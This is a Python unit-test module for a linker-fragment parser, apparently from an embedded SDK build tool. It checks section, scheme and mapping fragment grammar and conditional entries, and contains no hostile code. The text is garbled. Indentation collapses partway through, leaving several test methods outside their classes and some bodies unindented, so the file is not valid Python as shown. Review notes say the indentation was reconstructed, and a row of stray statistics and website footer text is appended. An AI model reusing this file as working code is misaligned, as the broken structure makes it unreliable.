    fragment_file = FragmentFile(test_fragment, self.sdkconfig)
    self.assertEqual(len(fragment_file.fragments), 1)

    # below the minimum is a fatal error
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    value_a
key_3:
    value_1
    value_2
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)

    # above the maximum is a fatal error
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    value_a
key_3:
    value_1
    value_2
    value_3
    value_4
    value_5
    value_6
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)
def test_unsupported_key(self):
    """A key not present in the fragment's grammar is a fatal error."""
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    value_a
key_4:
    value_1
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)
def test_empty_fragment(self):
    """A fragment header with no keys at all fails to parse."""
    test_fragment = self.create_fragment_file(u"""
[test:test]
""")
    with self.assertRaises(ParseException):
        FragmentFile(test_fragment, self.sdkconfig)
def test_empty_conditional(self):
    """Every conditional branch must contain at least one entry, and
    'else' must not carry a condition."""
    # empty 'if' branch
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    if B = y:
    else:
        value_1
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)

    # 'else' with a trailing condition
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    if B = y:
        value_1
    else B = y:
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)

    # empty 'elif' branch
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    if B = y:
        value_1
    elif B = y:
    else:
        value_2
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)
def test_out_of_order_conditional(self):
    """'elif' or 'else' without a preceding 'if' is a fatal error."""
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    elif B = y:
        value_1
    else:
        value_2
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)

    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    else:
        value_2
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)
def test_required_keys(self):
    """Omitting the required key_1 is a fatal error."""
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_2:
    value_1
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)
def test_multiple_fragments(self):
    """Several fragments in one file are parsed in order."""
    test_fragment = self.create_fragment_file(u"""
[test:test1]
key_1:
    value_1

[test:test2]
key_1:
    value_2
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)

    self.assertEqual(len(fragment_file.fragments), 2)
    self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
    self.assertEqual(fragment_file.fragments[1].key_1[0], 'value_2')
def test_whole_conditional_fragment(self):
    """Entire fragments can be nested inside file-level conditionals.

    The expected results imply A=y, B=n, C=y in data/sdkconfig — TODO
    confirm against the data file.
    """
    test_fragment = self.create_fragment_file(u"""
if B = y:
    [test:test1]
    key_1:
        value_1
else:
    [test:test2]
    key_1:
        value_2

    if A = y:
        [test:test3]
        key_1:
            value_3

            if C = y:
                value_6

    [test:test4]
    key_1:
        value_4

[test:test5]
key_1:
    value_5
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)

    # test1 is skipped (B=n); the others appear in file order
    self.assertEqual(len(fragment_file.fragments), 4)
    self.assertEqual(fragment_file.fragments[0].name, 'test2')
    self.assertEqual(fragment_file.fragments[1].name, 'test3')
    self.assertEqual(fragment_file.fragments[1].key_1[1], 'value_6')
    self.assertEqual(fragment_file.fragments[2].name, 'test4')
    self.assertEqual(fragment_file.fragments[3].name, 'test5')
def test_equivalent_conditional_fragment(self):
    """A file-level conditional around whole fragments and a key-level
    conditional inside one fragment produce the same result."""
    test_fragment1 = self.create_fragment_file(u"""
if A = y:
    [test:test1]
    key_1:
        value_1
else:
    [test:test2]
    key_1:
        value_2
""")
    fragment_file1 = FragmentFile(test_fragment1, self.sdkconfig)

    self.assertEqual(len(fragment_file1.fragments), 1)
    self.assertEqual(fragment_file1.fragments[0].key_1[0], 'value_1')

    test_fragment2 = self.create_fragment_file(u"""
[test:test1]
key_1:
    if A = y:
        value_1
    else:
        value_2
""")
    fragment_file2 = FragmentFile(test_fragment2, self.sdkconfig)

    self.assertEqual(len(fragment_file2.fragments), 1)
    self.assertEqual(fragment_file2.fragments[0].key_1[0], 'value_1')
class SectionsTest(FragmentTest):
    """Tests for the [sections:*] fragment grammar."""

    def test_basic(self):
        """'entries' values are collected into a set of section names."""
        test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
    .section1
    .section2
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        self.assertEqual(fragment_file.fragments[0].entries, {'.section1', '.section2'})

    def test_duplicate_entries(self):
        """Duplicate section names collapse in the resulting set."""
        test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
    .section1
    .section2
    .section3
    .section2
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        self.assertEqual(fragment_file.fragments[0].entries, {'.section1', '.section2', '.section3'})

    def test_empty_entries(self):
        """'entries' must end up with at least one section name."""
        test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)

        # a false condition leaving 'entries' empty is a fatal error
        test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
    if B = y:
        .section1
""")
        with self.assertRaises(ParseFatalException):
            FragmentFile(test_fragment, self.sdkconfig)

    def test_entries_grammar(self):
        """Exercise valid and invalid section-name spellings, including the
        trailing '+' notation."""
        test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
    _valid1
    valid2.
    .valid3_-
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        self.assertEqual(fragment_file.fragments[0].entries,
                         {'_valid1', 'valid2.', '.valid3_-'})

        # invalid starting char
        test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
    1invalid
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)

        test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
    -invalid
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)

        # + notation
        test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
    valid+
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        self.assertEqual(fragment_file.fragments[0].entries,
                         {'valid+'})

        # '+' is only allowed as the final character
        test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
    inva+lid+
""")
        with self.assertRaises(ParseFatalException):
            FragmentFile(test_fragment, self.sdkconfig)
class SchemeTest(FragmentTest):
    """Tests for the [scheme:*] fragment grammar."""

    def test_basic(self):
        """'sections -> target' entries parse into (sections, target) tuples."""
        test_fragment = self.create_fragment_file(u"""
[scheme:test]
entries:
    sections1 -> target1
    sections2 -> target2
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        self.assertEqual(fragment_file.fragments[0].entries,
                         {('sections1', 'target1'),
                          ('sections2', 'target2')})

    def test_duplicate_entries(self):
        """Duplicate entries collapse in the resulting set."""
        test_fragment = self.create_fragment_file(u"""
[scheme:test]
entries:
    sections1 -> target1
    sections2 -> target2
    sections2 -> target2
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        self.assertEqual(fragment_file.fragments[0].entries,
                         {('sections1', 'target1'),
                          ('sections2', 'target2')})

    def test_empty_entries(self):
        """'entries' must end up with at least one mapping."""
        test_fragment = self.create_fragment_file(u"""
[scheme:test]
entries:
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)

        # a false condition leaving 'entries' empty is a fatal error
        test_fragment = self.create_fragment_file(u"""
[scheme:test]
entries:
    if B = y:
        sections1 -> target1
""")
        with self.assertRaises(ParseFatalException):
            FragmentFile(test_fragment, self.sdkconfig)

    def test_improper_grammar(self):
        """The separator between sections and target must be '->'."""
        test_fragment = self.create_fragment_file(u"""
[scheme:test]
entries:
    sections1, target1 # improper separator
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)
class MappingTest(FragmentTest):
    """Tests for the [mapping:*] fragment grammar."""
def test_basic(self):
    """Mapping entries parse into (object, symbol, scheme) tuples; a
    missing ':symbol' part is stored as None."""
    test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
    obj:symbol (noflash)
    obj (noflash)
    obj:symbol_2 (noflash)
    obj_2 (noflash)
    * (noflash)
""")
    expected = {('obj', 'symbol', 'noflash'),
                ('obj', None, 'noflash'),
                ('obj', 'symbol_2', 'noflash'),
                ('obj_2', None, 'noflash'),
                ('*', None, 'noflash')}

    fragment_file = FragmentFile(test_fragment, self.sdkconfig)
    self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_archive(self):
    """The 'archive' key takes exactly one value."""
    # no archive name
    test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
entries:
    * (default)
""")
    with self.assertRaises(ParseException):
        FragmentFile(test_fragment, self.sdkconfig)

    # more than one archive name
    test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
    lib1.a
    lib2.a
entries:
    * (default)
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)
def test_empty_entries(self):
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
lib.a
entries:
if B = y:
* (noflash) # if condition is false, then no 'entries' key value
""")
expected = set()
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(expected, fragment_file.fragments[0].entries)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
lib.a
entries:
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
def test_duplicate_entries(self):
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
lib.a
entries:
obj:symbol (noflash)
obj:symbol (noflash)
""")
expected = {('obj', 'symbol', 'noflash')}
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_invalid_grammar(self):
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
lib.a
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
entries:
* (default)
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
obj: (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
obj: ()
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
obj:symbol
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
(noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
obj:* (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
:symbol (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
*:symbol (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
class DeprecatedMappingTest(FragmentTest):
    """Tests for the deprecated ``[mapping]`` fragment grammar, where
    conditions are written as ``: <condition>`` lines and a fragment name
    is derived from the archive.

    NOTE(review): indentation inside the fragment strings is significant
    to the grammar and was reconstructed — confirm against the parser's
    expected layout.
    """

    def test_valid_grammar(self):
        """All entry forms parse; comments and extra whitespace inside an
        entry are ignored; the fragment name is derived from the archive
        by replacing '.' with '_'."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    obj:symbol (noflash)
    # Comments should not matter
    obj (noflash)
    # Nor should whitespace
    obj  :  symbol_2 (    noflash )
    obj_2  ( noflash )
    * (noflash)
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        self.assertEqual('lib.a', fragment_file.fragments[0].archive)
        self.assertEqual('lib_a', fragment_file.fragments[0].name)
        expected = {('obj', 'symbol', 'noflash'),
                    ('obj', None, 'noflash'),
                    ('obj', 'symbol_2', 'noflash'),
                    ('obj_2', None, 'noflash'),
                    ('*', None, 'noflash')
                    }
        self.assertEqual(expected, fragment_file.fragments[0].entries)

    def test_explicit_blank_default_w_others(self):
        """With a false condition and an empty explicit default, only the
        catch-all default entry remains."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : A = n
    obj_a (noflash)
    : default
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        expected = {('*', None, 'default')}
        self.assertEqual(expected, fragment_file.fragments[0].entries)

    def test_implicit_blank_default_w_others(self):
        """With a false condition and no written default, the implicit
        default entry is generated."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : A = n
    obj_a (noflash)
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        expected = {('*', None, 'default')}
        self.assertEqual(expected, fragment_file.fragments[0].entries)

    def test_explicit_blank_default(self):
        """An explicit, empty ': default' section yields the catch-all
        default entry."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : default
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        expected = {('*', None, 'default')}
        self.assertEqual(expected, fragment_file.fragments[0].entries)

    def test_implicit_blank_default(self):
        # NOTE(review): this fragment is identical to
        # test_explicit_blank_default and does not actually exercise an
        # *implicit* default — verify the intended fragment text.
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : default
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        expected = {('*', None, 'default')}
        self.assertEqual(expected, fragment_file.fragments[0].entries)

    def test_multiple_entries(self):
        """Only the entries under the true condition (B = n) survive."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : A = n
    obj_a1 (noflash)
    obj_a2 (noflash)
    : B = n
    obj_b1 (noflash)
    obj_b2 (noflash)
    obj_b3 (noflash)
    : C = n
    obj_c1 (noflash)
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        expected = {('obj_b1', None, 'noflash'),
                    ('obj_b2', None, 'noflash'),
                    ('obj_b3', None, 'noflash')}
        self.assertEqual(expected, fragment_file.fragments[0].entries)

    def test_blank_entries(self):
        """A true condition with no entries of its own (B = n) means only
        the catch-all default entry is produced."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : A = n
    obj_a (noflash)
    : B = n
    : C = n
    obj_c (noflash)
    : default
    obj (noflash)
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        expected = {('*', None, 'default')}
        self.assertEqual(expected, fragment_file.fragments[0].entries)

    def test_blank_first_condition(self):
        """Entries are not allowed before the first ': <condition>' line."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    obj_a (noflash)
    : CONFIG_B = y
    obj_b (noflash)
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)

    def test_nonlast_default_1(self):
        """': default' must be the last condition block."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : default
    obj_a (noflash)
    : CONFIG_A = y
    obj_A (noflash)
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)

    def test_nonlast_default_2(self):
        """': default' sandwiched between two conditions is rejected."""
        # Fixed an unbalanced '(noflash' in the last entry so the test
        # fails for the non-last-default rule, not a stray syntax error.
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : A = y
    obj_A (noflash)
    : default
    obj_a (noflash)
    : B = y
    obj_B (noflash)
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)

    def test_nonlast_default_3(self):
        """A bare ':' (shorthand default) before another condition is
        rejected, same as an explicit non-last default."""
        # Fixed an unbalanced '(noflash' in the last entry so the test
        # fails for the non-last-default rule, not a stray syntax error.
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : A = y
    obj_A (noflash)
    :
    obj_a (noflash)
    : B = y
    obj_B (noflash)
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)

    def test_duplicate_default_1(self):
        """Two explicit ': default' blocks are rejected."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : CONFIG_A = y
    obj_A (noflash)
    : default
    obj_a (noflash)
    : CONFIG_B = y
    obj_B (noflash)
    : default
    obj_a (noflash)
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)

    def test_duplicate_default_2(self):
        """An explicit ': default' followed by the bare ':' shorthand also
        counts as a duplicate default."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : CONFIG_A = y
    obj_A (noflash)
    : CONFIG_B = y
    obj_a (noflash)
    : default
    obj_B (noflash)
    :
    obj_a (noflash)
""")
        with self.assertRaises(ParseException):
            FragmentFile(test_fragment, self.sdkconfig)

    def test_mixed_deprecated_mapping(self):
        """A deprecated [mapping] and a new-style [mapping:test] in the
        same file parse to equivalent entries."""
        test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
    : A = n
    obj_A (noflash)
    : default
    obj_B (noflash)

[mapping:test]
archive: lib.a
entries:
    if A = n:
        obj_A (noflash)
    else:
        obj_B (noflash)
""")
        fragment_file = FragmentFile(test_fragment, self.sdkconfig)
        self.assertEqual(2, len(fragment_file.fragments))
        self.assertEqual(fragment_file.fragments[0].entries,
                         fragment_file.fragments[1].entries)
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main()
| 25.574669 | 101 | 0.650344 | 3,206 | 27,058 | 5.248284 | 0.080786 | 0.113396 | 0.129324 | 0.091525 | 0.845299 | 0.823725 | 0.806252 | 0.782955 | 0.751099 | 0.720611 | 0 | 0.017983 | 0.233425 | 27,058 | 1,057 | 102 | 25.598865 | 0.793221 | 0.027829 | 0 | 0.800931 | 0 | 0 | 0.259996 | 0.003728 | 0 | 0 | 0 | 0 | 0.117579 | 1 | 0.054715 | false | 0.001164 | 0.012806 | 0.001164 | 0.077998 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.